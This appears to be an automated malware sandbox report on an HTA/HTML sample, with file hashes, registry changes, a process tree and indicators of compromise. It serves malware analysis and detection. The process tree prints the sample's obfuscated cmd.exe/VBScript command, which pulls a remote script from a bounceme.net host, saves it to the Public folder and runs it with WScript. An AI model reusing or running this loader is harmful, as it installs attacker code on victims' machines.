Analysis
-
max time kernel
138s -
max time network
265s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
22-01-2024 16:15
Static task
static1
Behavioral task
behavioral1
Sample
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
Resource
win10v2004-20231215-en
General
-
Target
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
-
Size
7KB
-
MD5
f3ab9f8fe8995462c3245f10ed76ae4f
-
SHA1
6aa8e54760bcc9aa7402e75d7cb33011e0673f7f
-
SHA256
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987
-
SHA512
68d097848803e6c9f009ee41da373b5ce1136e40c750c0c704a137ca1a11bd483dc1f06089e9eb9310b47ee7232ac6bc8ad6c302bbe064765f266efef579848b
-
SSDEEP
192:CzHyJ1AwYaKyJ0VmW98+n6z39EPHzyKQSOOUHdLqmTlphHBLmBdexU+4ur6kUjRd:CzyJ1pROT
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 19 1744 WScript.exe 21 1744 WScript.exe 23 1744 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31083854" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4d347bde384c849be64bb2f1c358fef00000000020000000000106600000001000020000000659c2788ed01d2e004362978bc14f22bac80b0b87ec4e55eddaec65d063514df000000000e8000000002000020000000033689a658725cfdc3fa3592ced93bc6e6c9b9604516446792accbcdd89f83df20000000666aa86c23bf9ff1e4938771d81139ac9e19f7377fcddc585cc5fb1db6c4fd44400000007c8e33c333770ee711db315917f13cd4e6951f411e20128526888fdc81344abe0fd56aefc1b5a4b0bcc6e7271dc8d085cbabcef7aad4f244f5ae7b1a2f8ffdba iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31083854" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4d347bde384c849be64bb2f1c358fef0000000002000000000010660000000100002000000096b719921246106c87c9ba690896c5570f92c7544985092ce1211a5c638cb712000000000e8000000002000020000000375fe10c9264a6ec0c27237c4b2d4ca33479abbd37d2d3e78292f46b1c9e81322000000073522b23e6520100fce640fb83eb782fb1a84902d094c39c384232c3fd2e3d35400000004205f7549ab7cacf0b90104143b2faa40e12c8e6a3c1989e77ef3d532e3988ad0ef4026c9d4929515447930e99ca18445e3513be0e5ea2242ec1f5e89b7b28ad iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31083854" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "412705121" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1321162160" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1423973882" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{7A10A32E-B941-11EE-B6AD-527BFEDB591A} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 307a04574e4dda01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 204e6d574e4dda01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1321162160" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings cmd.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3924 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 3924 iexplore.exe 3924 iexplore.exe 3452 IEXPLORE.EXE 3452 IEXPLORE.EXE 3452 IEXPLORE.EXE 3452 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3924 wrote to memory of 3452 3924 iexplore.exe 87 PID 3924 wrote to memory of 3452 3924 iexplore.exe 87 PID 3924 wrote to memory of 3452 3924 iexplore.exe 87 PID 3452 wrote to memory of 4248 3452 IEXPLORE.EXE 92 PID 3452 wrote to memory of 4248 3452 IEXPLORE.EXE 92 PID 3452 wrote to memory of 4248 3452 IEXPLORE.EXE 92 PID 4248 wrote to memory of 888 4248 cmd.exe 94 PID 4248 wrote to memory of 888 4248 cmd.exe 94 PID 4248 wrote to memory of 888 4248 cmd.exe 94 PID 888 wrote to memory of 1744 888 cmd.exe 96 PID 888 wrote to memory of 1744 888 cmd.exe 96 PID 888 wrote to memory of 1744 888 cmd.exe 96
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3924 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c EcHo Z5ceEsS49="." : FunctIon Tji57(H27N20):NiF24 = Array(":","t","r","c","1"):Tji57 = NiF24(H27N20):end function :: fm6fciL34 = "S"+ Tji57(3) +"rip"+ Tji57(1) + Tji57(0) + "hT"+ Tji57(1) +"ps://contdlk"+Z5ceEsS49+"bounceme"+Z5ceEsS49+"net/g1":eval("Ge"+ Tji57(1) +"Obje"+ Tji57(3)+ Tji57(1) +"(fm6fciL34)") > nul > C:\Users\Public\^dmpRBh785.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs3⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
\??\c:\windows\SysWOW64\cmd.exec:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"5⤵
- Blocklisted process makes network request
PID:1744
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD500c810ad5af9bb1ffa13d83698695136
SHA1356ae631a77f5b6039531fd01904a27e8d64fd3c
SHA256646abae3e23a04a2e487d6811e6fa2f65666e86f650baefcd821f45737165854
SHA512b7335f7b5f9a36999e5eb128f839ad8566c50ef9922f19ddff691266c745faa72a8ecedc97de3e91aa7be7e99df3c4928660f147aa1c9dd76361eb2eb2b1c3fc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD568e0995a42b11c83a04a97ab2b499487
SHA13c26e2b2e2fce59b1c19b11e59f256ed389d8fb0
SHA256cf2594f79e4e6476c94ce77934d2b1c3af8db189099cb61bf6235d0045480f96
SHA5122e82c22a1d099d3e84fcc134edef4576729e6af59df5161683fa63bf9d48a458c5eaf8f427bcd412ce3ad39df420fad35d90d40b3303b614cee57a839e3e376a
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
306B
MD5154b54da0532f06d78997442ad648d45
SHA11087a477ec4815eade97d338743ce63361e5f09b
SHA2564f72eeaf5d050f5077a82782d7dfbceed38448b1569836f8b0550dcd3080574d
SHA51264bc9c808251aa272352cef3d74620974f962fbc5d511474a8f8ea0393aa43a76a0ebf8b3877d5f3ccaa4b9c7e25c98793b0cad8928d68cc4a0a9bcc99c5fe2c